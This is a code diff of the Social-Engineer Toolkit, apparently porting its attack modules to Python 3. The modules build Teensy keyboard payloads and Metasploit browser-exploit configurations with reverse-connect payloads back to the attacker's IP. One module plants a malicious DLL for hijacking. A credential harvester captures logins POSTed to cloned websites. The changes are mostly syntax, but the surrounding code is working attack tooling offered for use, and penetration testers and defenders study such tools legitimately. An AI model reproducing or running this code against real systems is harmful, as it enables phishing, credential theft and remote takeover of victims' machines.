Keyboard.send_now();
}
""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,bat,vbs))
""" % (random_filename, random_filename, powershell_command, vbs, bat, vbs, vbs, random_filename, bat, vbs))
# delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait()
print "[*] Binary to Teensy file exported as teensy.pde"
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" %
(random_filename), shell=True).wait()
print("[*] Binary to Teensy file exported as teensy.pde")
# write the teensy.pde file out
filewrite = file("teensy.pde", "w")
filewrite = open("teensy.pde", "w")
# write the teensy.pde file out
filewrite.write(output_variable)
# close the file
filewrite.close()
print """
print("""
Instructions:
@ -230,5 +245,5 @@ some code marked above based on the Teensy and the Teensy++ based on how you sol
on.
Happy hacking.
"""
""")
return_continue()

89
src/teensy/teensy.py
View file

@ -12,71 +12,73 @@ import datetime
from src.core.setcore import *
# pull metasploit path
msf_path=meta_path()
msf_path = meta_path()
# check operating system
operating_system = check_os()
now=datetime.datetime.today()
if operating_system != "windows": import pexpect
now = datetime.datetime.today()
if operating_system != "windows":
import pexpect
# check to see if setdir is created
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
definepath=os.getcwd()
definepath = os.getcwd()
# define if use apache or not
apache=0
apache = 0
# open set_config here
apache_check=file("/etc/setoolkit/set.config", "r").readlines()
apache_check = open("/etc/setoolkit/set.config", "r").readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
line=line.rstrip()
line = line.rstrip()
# if apache is turned on get things ready
match=re.search("APACHE_SERVER=ON",line)
match = re.search("APACHE_SERVER=ON", line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2=re.search("APACHE_DIRECTORY=", line2)
match2 = re.search("APACHE_DIRECTORY=", line2)
if match2:
line2=line2.rstrip()
apache_path=line2.replace("APACHE_DIRECTORY=","")
apache=1
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
# grab info from config file
fileopen=file(setdir + "/teensy", "r")
counter=0
payload_counter=0
fileopen = open(setdir + "/teensy", "r")
counter = 0
payload_counter = 0
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
if counter == 0:
choice=str(line)
choice = str(line)
if counter == 1:
payload_counter=1
counter=counter+1
payload_counter = 1
counter = counter + 1
if choice != "14":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
if not os.path.isfile(setdir + "/teensy"):
print_error("FATAL:Something went wrong, the Teensy config file was not created.")
print_error(
"FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
def writefile(filename,now):
fileopen=file("src/teensy/%s" % filename, "r")
filewrite=file(setdir + "/reports/teensy_%s.pde" % (now), "w")
def writefile(filename, now):
fileopen = open("src/teensy/%s" % filename, "r")
filewrite = open(setdir + "/reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match=re.search("IPADDR",line)
match = re.search("IPADDR", line)
if match:
line=line.replace("IPADDR", ipaddr)
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
@ -91,49 +93,52 @@ if choice == "1":
# wscript downloader
if choice == "2":
writefile("wscript.pde",now)
writefile("wscript.pde", now)
# powershell reverse
if choice == "3":
writefile("powershell_reverse.pde",now)
writefile("powershell_reverse.pde", now)
# beef injector
if choice == "4":
writefile("beef.pde",now)
writefile("beef.pde", now)
# java applet downloader
if choice == "5":
writefile("java_applet.pde",now)
writefile("java_applet.pde", now)
# gnome wget downloader
if choice == "6":
writefile("gnome_wget.pde",now)
writefile("gnome_wget.pde", now)
if choice == "13":
writefile("peensy.pde",now)
writefile("peensy.pde", now)
payload_counter = 0
# save our stuff here
print bcolors.BLUE + "\n[*] PDE file created. You can get it under '%s/reports/teensy_%s.pde' " % (setdir,now) +bcolors.ENDC
print bcolors.GREEN + '[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' + bcolors.ENDC
print bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" + bcolors.ENDC
print(bcolors.BLUE + "\n[*] PDE file created. You can get it under '%s/reports/teensy_%s.pde' " % (setdir, now) + bcolors.ENDC)
print(bcolors.GREEN + '[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' + bcolors.ENDC)
print(bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" + bcolors.ENDC)
pause = raw_input("Press {return} to continue.")
pause = input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir %s/web_clone/;cp %s/msf.exe %s/web_clone/x.exe 1> /dev/null 2> /dev/null" % (setdir,setdir,setdir), shell=True).wait()
subprocess.Popen("mkdir %s/web_clone/;cp %s/msf.exe %s/web_clone/x.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir), shell=True).wait()
if operating_system != "windows":
child=pexpect.spawn("python src/html/web_server.py")
child = pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp %s/msf.exe %s/x.exe" % (setdir,apache_path), shell=True).wait()
subprocess.Popen("cp %s/msf.exe %s/x.exe" %
(setdir, apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"):
print bcolors.BLUE + "\n[*] Launching MSF Listener..."
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC
print(bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC)
try:
if operating_system != "windows":
child1=pexpect.spawn("%smsfconsole -r %s/meta_config\r\n\r\n" % (msf_path,setdir))
child1 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (msf_path, setdir))
child1.interact()
except:
if operating_system != "windows":

122
src/webattack/browser_exploits/gen_payload.py
View file

@ -6,156 +6,164 @@ from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
definepath=os.getcwd()
definepath = os.getcwd()
me = mod_name()
port = ""
# see if multi_attack is being used and prep everything we need
multiattack="off"
webdav_enabled="off"
multiattack = "off"
webdav_enabled = "off"
if os.path.isfile(setdir + "/multi_payload"):
multiattack="on"
multiattack = "on"
# just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port
webdav_enabled="off"
webdav_write=file(setdir + "/webdav_enabled","w")
webdav_enabled = "off"
webdav_write = open(setdir + "/webdav_enabled", "w")
fileopen=file(setdir + "/multi_payload", "r")
fileopen = open(setdir + "/multi_payload", "r")
for line in fileopen:
match=re.search("MAIN=",line)
match = re.search("MAIN=", line)
if match:
port=line.replace("MAIN=","")
match2=re.search("MAINPAYLOAD=",line)
port = line.replace("MAIN=", "")
match2 = re.search("MAINPAYLOAD=", line)
if match2:
exploit=line.replace("MAINPAYLOAD=",line)
exploit = line.replace("MAINPAYLOAD=", line)
# grab metasploit path
metasploit_iframe="8080"
metasploit_iframe = "8080"
msf_path = meta_path()
configfile=file("/etc/setoolkit/set.config","r").readlines()
configfile = open("/etc/setoolkit/set.config", "r").readlines()
for line in configfile:
line=line.rstrip()
line = line.rstrip()
match4=re.search("METERPRETER_MULTI_SCRIPT=", line)
match4 = re.search("METERPRETER_MULTI_SCRIPT=", line)
if match4:
meterpreter_multi=line.replace("METERPRETER_MULTI_SCRIPT=", "")
meterpreter_multi = line.replace("METERPRETER_MULTI_SCRIPT=", "")
match5=re.search("METERPRETER_MULTI_COMMANDS=", line)
match5 = re.search("METERPRETER_MULTI_COMMANDS=", line)
if match5:
meterpreter_multi_command=line.replace("METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command=meterpreter_multi_command.replace(";", "\n")
meterpreter_multi_command = line.replace(
"METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command = meterpreter_multi_command.replace(
";", "\n")
match6=re.search("METASPLOIT_IFRAME_PORT=", line)
match6 = re.search("METASPLOIT_IFRAME_PORT=", line)
if match6:
metasploit_iframe=line.replace("METASPLOIT_IFRAME_PORT=", "")
metasploit_iframe = line.replace("METASPLOIT_IFRAME_PORT=", "")
match7=re.search("AUTO_MIGRATE=", line)
match7 = re.search("AUTO_MIGRATE=", line)
if match7:
auto_migrate=line.replace("AUTO_MIGRATE=", "")
auto_migrate = line.replace("AUTO_MIGRATE=", "")
# grab attack vector
attack_vector=""
attack_vector = ""
if os.path.isfile(setdir + "/attack_vector"):
fileopen=file(setdir + "/attack_vector")
fileopen = open(setdir + "/attack_vector")
for line in fileopen:
attack_vector=line.rstrip()
attack_vector = line.rstrip()
# open ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your ipaddress: ")
ipaddr = input("Enter your ipaddress: ")
update_options("IPADDR=" + ipaddr)
debug_msg(me,"printing 'text.browser_exploits_menu'",5)
show_browserexploit_menu = create_menu(browser_exploits_text, browser_exploits_menu)
exploit=raw_input(setprompt(["4"], ""))
debug_msg(me, "printing 'text.browser_exploits_menu'", 5)
show_browserexploit_menu = create_menu(
browser_exploits_text, browser_exploits_menu)
exploit = input(setprompt(["4"], ""))
if exploit == '':
print "\n Defaulting to IE CSS Import Use After Free exploit....."
exploit=("1")
print("\n Defaulting to IE CSS Import Use After Free exploit.....")
exploit = ("1")
# dictionary = ms_module
exploit = ms_module(exploit)
choice1=""
choice1 = ""
if multiattack == "off":
if exploit != "windows/browser/java_codebase_trust":
show_payload_menu_2 = create_menu(payload_menu_2_text, payload_menu_2)
choice1=raw_input(setprompt(["4"], ""))
choice1 = input(setprompt(["4"], ""))
if choice1 == '':choice1 ='2'
if choice1 == '':
choice1 = '2'
choice1 = ms_payload(choice1)
# if we are using the java exploit
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean" or exploit == "exploit/multi/browser/java_jre17_jmxbean_2":
print "[*] Selecting Java Meterpreter as payload since it is exploit specific."
print("[*] Selecting Java Meterpreter as payload since it is exploit specific.")
choice1 = ("java/meterpreter/reverse_tcp")
if multiattack == "off":
port=raw_input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "": port = "443"
port = input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "":
port = "443"
# check to see if we need to use the multi attack vector in java
if not os.path.isfile(setdir + "/multi_java"):
filewrite=file(setdir + "/meta_config", "w")
filewrite = open(setdir + "/meta_config", "w")
if os.path.isfile(setdir + "/multi_java"):
filewrite=file(setdir + "/meta_config", "a")
filewrite = open(setdir + "/meta_config", "a")
filewrite.write("use "+exploit+"\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST "+ipaddr+"\n")
filewrite.write("use " + exploit + "\n")
filewrite.write("set PAYLOAD " + choice1 + "\n")
filewrite.write("set LHOST " + ipaddr + "\n")
filewrite.write("set LPORT %s" % (port) + "\n")
#filewrite.write("set ENCODING shikata_ga_nai"+"\n")
filewrite.write("set URIPATH /"+"\n")
filewrite.write("set URIPATH /" + "\n")
if choice1 == ("windows/download_exec"):
print "You selected the download and execute payload. Enter the URL to your executable."
print "Example would be http://172.16.32.129/malicious.exe"
set_url=raw_input(setprompt(["4"], "URL to the executable"))
print("You selected the download and execute payload. Enter the URL to your executable.")
print("Example would be http://172.16.32.129/malicious.exe")
set_url = input(setprompt(["4"], "URL to the executable"))
filewrite.write("set URL %s" % (set_url) + "\n")
# if it isn't used for webdav then redirect to metasploit iframe configuration setting
# if it isn't used for webdav then redirect to metasploit iframe
# configuration setting
if exploit != 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
if exploit != 'windows/browser/ms10_046_shortcut_icon_dllloader':
if exploit != 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT %s" % (metasploit_iframe) + "\n")
# if webdav is needed for exploit, change base port
if exploit == 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/ms10_046_shortcut_icon_dllloader':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
extension=raw_input(setprompt(["4"], "Extension types for this exploit [all]"))
extension = input(
setprompt(["4"], "Extension types for this exploit [all]"))
if extension == '':
filewrite.write("set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html"+"\n")
filewrite.write(
"set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html" + "\n")
else:
filewrite.write("set EXTENSIONS %s" % (extension) + "\n")
filewrite.write("set ExitOnSession false\n")
# if we are using multiple meterpreter multiscripts
if meterpreter_multi == "ON":
multiwrite=file(setdir + "/multi_meter.file", "w")
multiwrite = open(setdir + "/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir))
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir))
multiwrite.close()
# auto migration
@ -172,6 +180,6 @@ if webdav_enabled == "on":
# this basically sets a flag we need to make some custom changes in web_server.py to get
# the docbase exploit to work properly
if exploit == ("windows/browser/java_docbase_bof"):
filewrite=file(setdir + "/docbase.file", "w")
filewrite = open(setdir + "/docbase.file", "w")
filewrite.write("DOCBASE=ON")
filewrite.close()

95
src/webattack/dll_hijacking/hijacking.py
View file

@ -13,81 +13,85 @@ import binascii
from src.core.menu.text import dll_hijacker_text
from src.core.setcore import *
definepath=os.getcwd()
definepath = os.getcwd()
try:
import zipfile
except ImportError, error:
except ImportError as error:
log(error)
print "Module 'zipfile' was not detected, please download and install the python zipfile module"
print("Module 'zipfile' was not detected, please download and install the python zipfile module")
exit_set()
print dll_hijacker_text
print(dll_hijacker_text)
# open the repository, its simple name,extension,dll
fileopen=file("src/webattack/dll_hijacking/repository", "r")
fileopen = open(setdir + "src/webattack/dll_hijacking/repository", "r")
# set base counter for our pick
print " Enter the choice of the file extension you want to attack:\n"
counter=1
print(" Enter the choice of the file extension you want to attack:\n")
counter = 1
for line in fileopen:
line=line.split(",")
print " " + str(counter)+". "+line[0]
counter=counter+1
line = line.split(",")
print(" " + str(counter) + ". " + line[0])
counter = counter + 1
print "\n"
choice=raw_input(setprompt(["2","15"], ""))
print("\n")
choice = input(setprompt(["2", "15"], ""))
if choice == 'exit':
exit_set()
if choice == "": choice="1"
if choice == "":
choice = "1"
choice=int(choice)
choice = int(choice)
# reset the counter and get our payload ready and selected
counter=1
fileopen=file("src/webattack/dll_hijacking/repository", "r")
counter = 1
fileopen = open(setdir + "src/webattack/dll_hijacking/repository", "r")
for line in fileopen:
line=line.split(",")
line = line.split(",")
if int(counter) == int(choice):
name=line[0].rstrip()
extension="."+line[1].rstrip()
dll=line[2].rstrip()
counter=counter+1
name = line[0].rstrip()
extension = "." + line[1].rstrip()
dll = line[2].rstrip()
counter = counter + 1
print "\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension,dll)
print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll))
# prep the directories
subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
filename1=raw_input(setprompt(["2","15"], "Enter the filename for the attack (example:openthis) [openthis]"))
if filename1 == "": filename1 = "openthis"
subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True).wait()
filename1 = input(setprompt(
["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]"))
if filename1 == "":
filename1 = "openthis"
# move the files there using the correct extension and file type
filewrite=file(setdir + "/dll/%s%s" % (filename1,extension),"w")
filewrite = open(setdir + "/dll/%s%s" % (filename1, extension), "w")
filewrite.write("EMPTY")
filewrite.close()
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["2","15"], "IP address to connect back on"))
ipaddr = input(setprompt(["2", "15"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
# replace ipaddress with one that we need for reverse connection back
fileopen=open("src/webattack/dll_hijacking/hijacking.dll" , "rb")
data=fileopen.read()
fileopen = open(setdir + "src/webattack/dll_hijacking/hijacking.dll", "rb")
data = fileopen.read()
filewrite=open(setdir + "/dll/%s" % (dll), "wb")
filewrite = open(setdir + "/dll/%s" % (dll), "wb")
host=int(len(ipaddr)+1) * "X"
host = int(len(ipaddr) + 1) * "X"
filewrite.write(data.replace(str(host), ipaddr+"\x00", 1))
filewrite.write(data.replace(str(host), ipaddr + "\x00", 1))
filewrite.close()
# ask what they want to use
print """
print("""
Do you want to use a zipfile or rar file. Problem with zip
is they will have to extract the files first, you can't just
open the file from inside the zip. Rar does not have this
@ -95,12 +99,13 @@ restriction and is more reliable
1. Rar File
2. Zip File
"""
""")
# flag a choice
choice=raw_input(setprompt(["2","15"], "[rar]"))
choice = input(setprompt(["2", "15"], "[rar]"))
# if default was selected just do rar
if choice == "": choice = "1"
if choice == "":
choice = "1"
# if its not a rar file
if choice != "1":
# if its not a zipfile, you messed up
@ -112,22 +117,23 @@ if choice != "1":
if choice == "1":
# basic counter
counter=0
counter = 0
# look for rar in default directories
rar_check = subprocess.Popen("rar",shell=True, stdout=subprocess.PIPE)
rar_check = subprocess.Popen("rar", shell=True, stdout=subprocess.PIPE)
# comunicate with the process
stdout_value = rar_check.communicate()[0]
# do a search to see if rar is present
match=re.search("Add files to archive", stdout_value)
match = re.search("Add files to archive", stdout_value)
# we get a hit?
if match:
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
counter=1
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
counter = 1
# if we didnt find rar
if counter == 0:
print "[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory."
print "[*] Defaulting to zipfile for the attack vector. Sorry boss."
print("[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory.")
print("[*] Defaulting to zipfile for the attack vector. Sorry boss.")
choice = "2"
# if its a zipfile zip the badboy up
@ -139,4 +145,5 @@ if choice == "2":
file.close()
if os.path.isfile(setdir + "/msf.exe"):
subprocess.Popen("cp %s/msf.exe %s/src/html/" % (setdir, definepath), shell=True).wait()
subprocess.Popen("cp %s/msf.exe %s/src/html/" %
(setdir, definepath), shell=True).wait()

1396
src/webattack/fsattack/fsattacks.py Executable file → Normal file
View file

File diff suppressed because one or more lines are too long

10
src/webattack/fsattack/full.py Executable file → Normal file
View file

@ -4,18 +4,18 @@
# Author: d4rk0
# twitter: @d4rk0s
from fsattacks import *
from .fsattacks import *
def mainFullScreenAttackLoadExample():
# Load And Start
# Load And Start
x = fullScreenAttacks()
# Checks config if set loads intro if not skips
x.phishMenuMain()
#if __name__ == "__main__":
# if __name__ == "__main__":
# Run if executed
mainFullScreenAttackLoadExample()

430
src/webattack/harvester/harvester.py
View file

@ -4,13 +4,13 @@ import sys
import os
import re
import cgi
import BaseHTTPServer
import SimpleHTTPServer
import http.server
import http.server
import socket
from SocketServer import BaseServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
from socketserver import BaseServer
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import threading
import datetime
import shutil
@ -29,21 +29,22 @@ from set_config import HARVESTER_LOG as logpath
sys.path.append(definepath)
if track_email == True:
print_status("You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
print_status(
"You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
apache_check = True
# detect openssl module
try:
from OpenSSL import SSL
# handle import error that openssl is not there
except ImportError:
print "Python OpenSSL wasn't detected, note that SSL compatibility is now turned off"
print("Python OpenSSL wasn't detected, note that SSL compatibility is now turned off")
############################################
# Credential harvester #
############################################
# define the current working directory
definepath=os.getcwd()
definepath = os.getcwd()
me = mod_name()
# append python to our current working directory
@ -52,134 +53,151 @@ sys.path.append(definepath)
# import the base setcore libraries
from src.core.setcore import *
attack_vector=""
fileopen=file(setdir + "/attack_vector", "r")
attack_vector = ""
fileopen = open(setdir + "/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
if line == 'multiattack':
attack_vector='multiattack'
attack_vector = 'multiattack'
# if attack vector isnt the multiattack
if attack_vector != "multiattack":
print bcolors.RED + """
print(bcolors.RED + """
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.""" + bcolors.ENDC
fields are available. Regardless, this captures all POSTs on a website.""" + bcolors.ENDC)
# see if we're tabnabbing or multiattack
homepath=os.getcwd()
homepath = os.getcwd()
# pull scraper
try: reload(src.webattack.harvester.scraper)
except: import src.webattack.harvester.scraper
try:
reload(src.webattack.harvester.scraper)
except:
import src.webattack.harvester.scraper
# GRAB DEFAULT PORT FOR WEB SERVER AND CHECK FOR COMMAND CENTER
command_center="off"
fileopen=file("/etc/setoolkit/set.config" , "r").readlines()
counter=0
command_center = "off"
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
counter = 0
for line in fileopen:
line=line.rstrip()
match=re.search("WEB_PORT=", line)
line = line.rstrip()
match = re.search("WEB_PORT=", line)
if match:
line=line.replace("WEB_PORT=", "")
web_port=line
counter=1
match2=re.search("COMMAND_CENTER=ON", line)
line = line.replace("WEB_PORT=", "")
web_port = line
counter = 1
match2 = re.search("COMMAND_CENTER=ON", line)
if match2:
command_center="on"
command_center_write=file(setdir + "/cc_harvester_hit" % (setdir),"w")
command_center = "on"
command_center_write = open(
setdir + "/cc_harvester_hit" % (setdir), "w")
# if nada default port 80
if counter == 0: web_port=80
if counter == 0:
web_port = 80
# pull URL field
counter=0
fileopen=file(setdir + "/site.template","r").readlines()
counter = 0
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
line = line.rstrip()
match = re.search("URL=", line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
RAW_URL = line.replace("URL=", "")
URL = line.replace("URL=http://", "")
URL = line.replace("URL=https://", "")
counter = 1
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
# this checks the set_config to see if we need to redirect to a different
# website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=")
if harvester_redirect.lower() == "on":
URL = check_config("HARVESTER_URL=")
counter = 1
if counter== 0: URL=''
if counter == 0:
URL = ''
# set ssl flag to false by default (counter basically)
ssl_flag="false"
self_signed="false"
ssl_flag = "false"
self_signed = "false"
# SEE IF WE WANT TO USE SSL
fileopen=file("/etc/setoolkit/set.config" , "r").readlines()
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("WEBATTACK_SSL=ON", line)
line = line.rstrip()
match = re.search("WEBATTACK_SSL=ON", line)
if match:
# if we hit on ssl being on, set flag to true
ssl_flag='true'
ssl_flag = 'true'
# if flag is true begin prepping SSL stuff
if ssl_flag=='true':
if ssl_flag == 'true':
# set another loop for find other variables we need for SSL setup
for line in fileopen:
# strip line feeds and carriage returns
line=line.rstrip()
line = line.rstrip()
# begin search for flags we need
match=re.search("SELF_SIGNED_CERT=ON", line)
match = re.search("SELF_SIGNED_CERT=ON", line)
# if we hit, lets create our own certificate
if match:
self_signed="true"
self_signed = "true"
# need to import our ssl module for creating a CA
sys.path.append("src/core/ssl")
# import our ssl module
import setssl
subprocess.Popen("cp %s/CA/*.pem %s" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp %s/CA/*.pem %s" % (setdir, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate
if self_signed== "false":
if self_signed == "false":
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
# search for cert path
match=re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
match = re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
if match:
pem_client=line.replace("PEM_CLIENT=","")
pem_client = line.replace("PEM_CLIENT=", "")
if not os.path.isfile(pem_client):
print "\nUnable to find PEM file, check location and config again."
print("\nUnable to find PEM file, check location and config again.")
exit_set()
if os.path.isfile(pem_client):
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2=re.search("PEM_SERVER=", line)
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2 = re.search("PEM_SERVER=", line)
if match2:
pem_server=line.replace("PEM_SERVER=","")
pem_server = line.replace("PEM_SERVER=", "")
if not os.path.isfile(pem_server):
print "\nUnable to find PEM file, check location and config again."
print("\nUnable to find PEM file, check location and config again.")
exit_set()
if os.path.isfile(pem_server):
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# url decode for postbacks
def htc(m):
return chr(int(m.group(1),16))
return chr(int(m.group(1), 16))
# url decode
def urldecode(url):
rex=re.compile('%([0-9a-hA-H][0-9a-hA-H])',re.M)
return rex.sub(htc,url)
rex = re.compile('%([0-9a-hA-H][0-9a-hA-H])', re.M)
return rex.sub(htc, url)
# here is where we specify how many people actually visited versus fell for it
visits = file(setdir + "/visits.file", "a")
bites = file(setdir + "/bites.file", "a")
visits = open(setdir + "/visits.file", "a")
bites = open(setdir + "/bites.file", "a")
# SET Handler for handling POST requests and general setup through SSL
class SETHandler(BaseHTTPRequestHandler):
def setup(self):
# added a try except block in case of transmission errors
try:
@ -189,25 +207,25 @@ class SETHandler(BaseHTTPRequestHandler):
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
# except errors and pass them
except: pass
except:
pass
# handle basic GET requests
def do_GET(self):
# import proper style css files here
# import proper style css files here
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
print('-' * 40)
print('Exception happened during processing of request from', end=' ')
print(client_address)
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
traceback.print_exc() # XXX But this goes to stderr!
print('-' * 40)
pass
counter = 0
# try block setup to catch transmission errors
@ -217,12 +235,12 @@ class SETHandler(BaseHTTPRequestHandler):
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file(setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
# visits.close()
counter = 1
# used for index2
@ -230,33 +248,34 @@ class SETHandler(BaseHTTPRequestHandler):
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file(setdir + "/web_clone/index2.html", "r")
fileopen = open(setdir + "/web_clone/index2.html", "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
# visits.close()
counter = 1
else:
if os.path.isfile(setdir + "/web_clone/%s" % (self.path)):
self.send_response(200)
self.end_headers()
fileopen=file(setdir + "/web_clone/%s" % (self.path), "rb")
fileopen = open(setdir + "/web_clone/%s" %
(self.path), "rb")
for line in fileopen:
self.wfile.write(line)
# if the file wasn't found
if counter == 0:
if os.path.isfile(setdir + "/web_clone/%s" % (self.path)):
fileopen=file(setdir + "/web_clone/%s" % (self.path), "rb")
fileopen = open(setdir + "/web_clone/%s" %
(self.path), "rb")
for line in fileopen:
self.wfile.write(line)
fileopen.close()
# handle errors, log them and pass through
except Exception, e:
except Exception as e:
# log to set
log(e)
# pass exceptions to keep going
@ -266,82 +285,90 @@ class SETHandler(BaseHTTPRequestHandler):
def do_POST(self):
length = int(self.headers.getheader('content-length'))
qs = self.rfile.read(length)
url=urldecode(qs)
url = urldecode(qs)
# specify we had a bite
bites.write("hit\n")
url=url.split("&")
url = url.split("&")
# change path to root for append on file
